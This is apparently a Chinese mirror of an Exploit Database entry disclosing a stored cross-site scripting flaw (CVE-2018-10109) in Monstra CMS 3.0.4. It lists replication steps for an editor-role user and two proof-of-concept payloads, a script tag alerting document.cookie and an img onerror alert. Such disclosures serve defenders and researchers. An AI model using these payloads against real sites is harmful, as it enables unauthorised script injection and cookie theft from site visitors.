Monstra cms 3.0.4 – Persitent Cross-Site Scripting

• Exploit Database
• 15 阅读

• 作者： Wenming Jiang
  日期： 2018-04-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44502/

• # Exploit Title: Monstra cms 3.0.4 - Persitent Cross-Site Scripting
  # Date: 2018-04-14
  # Exploit Author: Wenming Jiang
  # Vendor Homepage: https://github.com/monstra-cms/monstra
  # Software Link: https://github.com/monstra-cms/monstra
  # Version: 3.0.4
  # Tested on: php 5.6, apache2.2.29, macos 10.12.6
  # CVE :CVE-2018-10109
  
  
  #Description:
  #Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload
  #in the content section of a new page in the blog catalog.
  
  
  #Steps to replicate:
  #1. log into the system as an editor role
  #2. creat a new page in the blog catalog
  #3. navigate to content section
  #4. enter payload: <script>alert(document.cookie)</script>
  #5. visit http://<your_site>/monstra/blog/<page_name>.php, you will triage JavaScript execution
  
  
  
  #Exploit Code:
  <script>alert(document.cookie)</script>
  or
  <img src=1 onerror=alert(/xss/) >